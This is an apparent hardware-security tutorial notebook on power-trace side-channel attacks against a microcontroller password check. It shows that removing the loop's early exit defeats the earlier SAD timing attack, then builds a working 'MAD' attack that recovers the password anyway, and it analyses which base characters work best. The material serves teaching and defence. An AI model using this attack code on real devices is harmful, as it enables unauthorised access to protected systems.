# Attack Password with ~~Timing Analysis~~ Difference Analysis III (MAD)

In this example we want to improve `basic-passwdcheck` so that it resists the attack from the last tutorial.

## Improving the code

Let's first recap the password checking loop from `basic-passwdcheck`:
```c
for(uint8_t i = 0; i < sizeof(correct_passwd); i++){
    if (correct_passwd[i] != passwd[i]){
        passbad = 1;
        break;
    }
}
```

The timing attack discussed in the last example worked because the loop's runtime varies with the number of correct characters: once the first wrong character occurs, the loop breaks.
This is what we want to change:

```c
for(uint8_t i = 0; i < sizeof(correct_passwd); i++){
    if (correct_passwd[i] != passwd[i]){
        passbad = 1;
    }
}
```

This is an excerpt from `advanced-passwdcheck.c`. The loop no longer breaks after the first wrong character, so all characters of the password are always checked. In [Try the old Timing Attack](#Try-the-old-Timing-Attack) we can see that the old timing attack does not work anymore.
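
The difference between the two loops can be modelled without any hardware. The following Python sketch only counts loop iterations. It is a simplified model, not the firmware itself, and the function names and the example password are hypothetical.

```python
def early_exit_compare(correct, guess):
    """Model of the basic-passwdcheck loop: stop at the first mismatch."""
    passbad, iterations = 0, 0
    for c, g in zip(correct, guess):
        iterations += 1
        if c != g:
            passbad = 1
            break
    return passbad, iterations


def full_compare(correct, guess):
    """Model of the advanced-passwdcheck loop: always check every character."""
    passbad, iterations = 0, 0
    for c, g in zip(correct, guess):
        iterations += 1
        if c != g:
            passbad = 1
    return passbad, iterations


secret = "hunter"  # hypothetical password, for illustration only
for guess in ("xxxxxx", "huxxxx", "huntxx"):
    # Print the iteration count of both variants for each guess
    print(guess, early_exit_compare(secret, guess)[1], full_compare(secret, guess)[1])
```

In this model the iteration count of the first variant grows with the number of correct leading characters, while the second variant always runs the full length.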

## Basic Setup

Define Variables

In [None]:
%run "Init.ipynb"

Build target and upload

In [None]:
TARGET = 'advanced-passwdcheck'
%store TARGET
%run "Passwordcheck_Prepare.ipynb"

Import helper functions

In [None]:
%run "../helper_scripts/Setup_Generic.ipynb"

In [None]:
scope.adc.samples = 400

## Helper Functions for Password Attack

In [None]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool, Label

output_notebook()

In [None]:
def cap_pass_trace(pass_guess, fPrint = False):
    ret = ""
    reset_target(scope)
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    if fPrint == True:
        print(ret)
    
    scope.arm()
    target.flush()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    
    ret = ""
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()
    
    return trace, ret

In [None]:
def sad(trace1, trace2):
    return sum(abs(trace1 - trace2))

## Try the old Timing Attack

Let's try again to see a difference in terms of SAD between a correct and a wrong character.

In [None]:
outputbuf = ""
trace1, _ = cap_pass_trace('a\n', False)
trace2, _ = cap_pass_trace('b\n', False)
trace3, _ = cap_pass_trace('i\n', False)
p = figure()
p.add_tools(CrosshairTool())
p.line(range(len(trace1)), abs(trace1 - trace2), color='blue',
       legend='abs(trace1 - trace2) with SAD = {:.2f}'.format(sad(trace1, trace2)))
p.line(range(len(trace1)), abs(trace1 - trace3), color='red', 
       legend='abs(trace1 - trace3) with SAD = {:.2f}'.format(sad(trace1, trace3)))
show(p)

If you run this a few times, you will see that the SAD is around 8-10 and that the difference between the two SADs is far too small to distinguish right from wrong characters.

Have we found a "secure" solution where an attacker cannot reveal the password?
The answer is simple: no. It is just a bit harder, and we only have to tweak the attack a bit. You might notice a high peak at around position 70 in the plot above. This peak is much higher in the red plot than in the blue one.

We can use this peak to still get the attack working.

In [None]:
import numpy
def cap_pass_trace_multiple(guess, repetitions):
    traces = 0
    output = ''
    for _ in range(repetitions):
        t, o = cap_pass_trace(guess, False)
        traces += t
        output += o
    return traces, output

In the style of SAD (sum of absolute differences) we call this MAD: Maximum of absolute differences.

In [None]:
def mad(trace1, trace2):
    return max(abs(trace1 - trace2))
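
The contrast between the two metrics can be illustrated offline with synthetic data. This is a minimal sketch: the noise level, the peak height and the helper `synthetic_trace` are assumptions made up for illustration, not measurements from the target.

```python
import numpy as np


def sad(trace1, trace2):
    """Sum of absolute differences."""
    return np.sum(np.abs(trace1 - trace2))


def mad(trace1, trace2):
    """Maximum of absolute differences."""
    return np.max(np.abs(trace1 - trace2))


rng = np.random.default_rng(0)
N_SAMPLES = 400      # same length as scope.adc.samples above
NOISE_LEVEL = 0.02   # assumed noise standard deviation
PEAK_POS = 70        # position of the peak, as in the plot above


def synthetic_trace(peak_height):
    """Hypothetical trace: Gaussian noise plus one peak at PEAK_POS."""
    trace = rng.normal(0.0, NOISE_LEVEL, N_SAMPLES)
    trace[PEAK_POS] += peak_height
    return trace


base = synthetic_trace(0.0)
same = synthetic_trace(0.0)        # differs from base only by noise
different = synthetic_trace(0.5)   # differs from base by one peak

print("SAD:", sad(base, same), sad(base, different))
print("MAD:", mad(base, same), mad(base, different))
```

Because SAD adds up the noise of all 400 samples, a single peak barely changes it, whereas MAD looks only at the largest difference.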

If we record more than one trace per attempt, we can sum all traces recorded for the same attempt. The peak, and especially the difference between the peak heights, then becomes significant:

In [None]:
outputbuf = ""
trace1, out1 = cap_pass_trace_multiple('\x74\n', 3)
trace2, out2 = cap_pass_trace_multiple('a\n', 3)
trace3, out3 = cap_pass_trace_multiple('i\n', 3)

p = figure()
p.add_tools(CrosshairTool())
p.line(range(len(trace1)), abs(trace1 - trace2), color='blue',
       legend='abs(trace1 - trace2) with MAD = {:.2f}'.format(mad(trace1, trace2)))
p.line(range(len(trace1)), abs(trace1 - trace3), color='red', 
       legend='abs(trace1 - trace3) with MAD = {:.2f}'.format(mad(trace1, trace3)))
show(p)
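
Why summing helps can be sketched with synthetic data: a systematic peak adds up linearly over repetitions, while independent noise grows only with the square root of the number of traces. The values and helper names below are assumptions chosen for illustration, not measurements.

```python
import numpy as np

rng = np.random.default_rng(1)
N_SAMPLES, PEAK_POS = 400, 70
NOISE_LEVEL, PEAK_HEIGHT = 0.05, 0.1  # assumed values, not measured


def summed_traces(height, repetitions):
    """Sum `repetitions` hypothetical noisy traces with a peak at PEAK_POS."""
    total = np.zeros(N_SAMPLES)
    for _ in range(repetitions):
        trace = rng.normal(0.0, NOISE_LEVEL, N_SAMPLES)
        trace[PEAK_POS] += height
        total += trace
    return total


def peak_to_background(repetitions):
    """Ratio of the difference at the peak to the largest difference elsewhere."""
    diff = np.abs(summed_traces(PEAK_HEIGHT, repetitions)
                  - summed_traces(0.0, repetitions))
    return diff[PEAK_POS] / np.delete(diff, PEAK_POS).max()


for repetitions in (1, 3, 10, 30, 100):
    print(repetitions, round(peak_to_background(repetitions), 2))
```

In this model the ratio tends to grow with the number of repetitions, at the cost of a proportionally longer capture time.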

Now we can program an automated version of the password cracker again:

## MAD password attack

1. Start by capturing a wrong character. Let's call this `base_trace`.
2. Capture further characters and calculate the MAD between each of them and `base_trace`.
3. Start again from the beginning, incorporating the correct character that was found.

This is very similar to the SAD attack, except that we use a different distinguishing criterion, and every time we say 'capture a trace' we mean 'capture a few traces and sum them up'.
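
The steps above can be tried out offline against a simulated target. The sketch below is built on an assumed leak model (each mismatching character adds a small peak to the trace). The password, the function names and all numbers are hypothetical and do not describe the real firmware.

```python
import numpy as np

rng = np.random.default_rng(2)
SECRET = "k3y"  # hypothetical password of the simulated target
TRYLIST = "abcdefghijklmnopqrstuvwxyz0123456789"


def simulated_capture(guess, repetitions=2):
    """Stand-in for cap_pass_trace_multiple: summed traces plus target output."""
    total = np.zeros(400)
    for _ in range(repetitions):
        trace = rng.normal(0.0, 0.005, 400)
        for i, secret_char in enumerate(SECRET):
            # Assumed leak model: a mismatch at index i adds a small peak
            if i >= len(guess) or guess[i] != secret_char:
                trace[70 + 10 * i] += 0.2
        total += trace
    return total, ("Welcome" if guess == SECRET else "Denied")


def mad(trace1, trace2):
    return np.max(np.abs(trace1 - trace2))


def simulated_mad_attack(check_level=0.1, base_char="\x74", max_length=16):
    # '\x74' is the letter 't', so the simulated secret must not contain it
    password, output = "", ""
    while "Welcome" not in output and len(password) < max_length:
        # Step 1: base trace with a wrong next character
        base_trace, _ = simulated_capture(password + base_char)
        for c in TRYLIST:
            # Step 2: compare each candidate against the base trace
            trace, output = simulated_capture(password + c)
            if mad(base_trace, trace) > check_level:
                password += c  # Step 3: keep the character and start over
                break
        else:
            break  # no candidate stood out, give up instead of looping forever
    return password


print(simulated_mad_attack())
```

Unlike the hardware version, this sketch stops when no candidate exceeds `check_level`, which avoids an endless loop if the threshold is chosen too high.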

In [None]:
def mad_attack(check_level=0.1, base_char='\x74'):
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
    password = ''
    outputbuf = ''

    while 'Welcome' not in outputbuf:
        # Capture base_trace with a definitely wrong next character
        base_trace, _ = cap_pass_trace_multiple(password + base_char + '\n', 2)

        for c in trylist:
            # Try character
            trace, outputbuf = cap_pass_trace_multiple(password + c + '\n', 2)
            # Check if c is correct
            if mad(base_trace, trace) > check_level:
                print("Success: " + c)
                password += c
                break

    print('Successfully broken password: ' + password)

mad_attack()

We have not yet explained why `\x74` is a good base character. Answering this question requires a more detailed analysis:

## Analyze good base characters

First we define a function to print out and analyze the *quality* of a single base character.

In [None]:
import tqdm
import pandas

def test_base_char(base_char):
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
    stats = []
    base_trace, _ = cap_pass_trace_multiple(base_char + '\n', 2)
    for c in tqdm.tqdm_notebook(trylist):
        stats.append(('{:02x}'.format(ord(base_char)), c, mad(base_trace, cap_pass_trace_multiple(c + '\n', 2)[0])))
    df = pandas.DataFrame(stats, columns=['base_char', 'char', 'mad'])
    df = df.sort_values(by='mad', ascending=False)
    return df

stats = test_base_char('\xff')
stats

This can also be shown nicely in a plot:

In [None]:
import bokeh.palettes
import bokeh.transform
import bokeh.models

df = stats.copy().sort_values('char')

colormap = bokeh.transform.linear_cmap(
    field_name='mad', 
    palette=bokeh.palettes.Oranges6, 
    low=max(df['mad']),
    high=min(df['mad'])
)

p = figure(x_range=df['char'], title='MAD per tried character')
p.add_tools(CrosshairTool())
p.vbar(x='char', top='mad', source=df, width=0.5, color=colormap)
show(p)

### Analyze *all* possible base characters

In [None]:
import tqdm
import pandas as pd

def analyse_all_base_chars(
    base_list=list(map(chr, range(1, 256))), 
    trylist='abcdefghijklmnopqrstuvwxyz0123456789',
    filename='mad_chars_stats.dat',
):
    stats = []
    for base_char in tqdm.tqdm_notebook(base_list):
        base_trace, _ = cap_pass_trace_multiple(base_char + '\n', 2)
        for c in tqdm.tqdm_notebook(trylist):
            # Store the raw base character: the cells below call ord() on this column
            stats.append((base_char, c, mad(base_trace, cap_pass_trace_multiple(c + '\n', 2)[0])))

    stats = pd.DataFrame(stats, columns=['base_char', 'char', 'mad'])
    stats.to_pickle(filename)

# Commented out because it takes a very long time
# analyse_all_base_chars()

In [None]:
import pandas as pd
mad_chars_stats = pd.read_pickle('mad_chars_stats.dat')
mad_chars_stats

In [None]:
from bokeh.models import LinearColorMapper

df = mad_chars_stats.copy()
# df['mad'] = list(range(10))
df['base_char'] = ['0x%02x' % ord(x) for x in df['base_char']]

colormap = LinearColorMapper(
    palette=bokeh.palettes.PuRd5,
    low=max(df['mad']),
    high=min(df['mad']),
)

p = figure(
    x_range=df['base_char'].unique(),
    y_range=df['char'].unique(),
    plot_width=950,
    plot_height=500,
)

p.rect(x='base_char', y='char', source=df, width=1, height=1, 
       fill_color={'field': 'mad', 'transform': colormap},
       line_color=None)
show(p)

What can we see in the heatmap above?
* Dark rectangles represent a high MAD value.
* Light rectangles represent a low MAD value.
* We can see the correct character `i`.
* "Good" columns are those that do not have many dark rectangles.
* The "best" base character is the column in which the highest MAD value (ideally the one for `i`) is furthest from the next-highest value.

The "best" base character can also be found programmatically:

In [None]:
import numpy
import pandas

df = mad_chars_stats
stats = []
for base_char in df['base_char'].unique():
    vals = numpy.sort(df[df['base_char'] == base_char]['mad'])
    stats.append((hex(ord(base_char)), vals[-1], vals[-2], vals[-1] - vals[-2]))

df = pandas.DataFrame(stats, columns=['base_char', 'max', 'max2', 'diffdiff'])
df = df.sort_values(by=['diffdiff'], ascending=False)
df
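
The same ranking can be tried without the pickle file. The following sketch uses a small made-up table and a hypothetical helper `rank_base_chars`. It also records which character produced the highest MAD, which the cell above does not do.

```python
import pandas as pd

# Made-up values for illustration only, not real measurements
toy = pd.DataFrame(
    [
        ("0x74", "a", 0.02), ("0x74", "i", 0.30), ("0x74", "z", 0.03),
        ("0xff", "a", 0.20), ("0xff", "i", 0.28), ("0xff", "z", 0.05),
    ],
    columns=["base_char", "char", "mad"],
)


def rank_base_chars(df):
    """Rank base characters by the gap between their two highest MAD values."""
    rows = []
    for base_char, group in df.groupby("base_char"):
        top2 = group.nlargest(2, "mad")
        margin = top2.iloc[0]["mad"] - top2.iloc[1]["mad"]
        rows.append((base_char, top2.iloc[0]["char"], margin))
    ranking = pd.DataFrame(rows, columns=["base_char", "best_char", "margin"])
    return ranking.sort_values("margin", ascending=False).reset_index(drop=True)


print(rank_base_chars(toy))
```

A large `margin` means that one character clearly stands out for that base character. Whether it is the correct one still has to be checked against `best_char`.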

## Disconnect

In [None]:
scope.dis()
target.dis()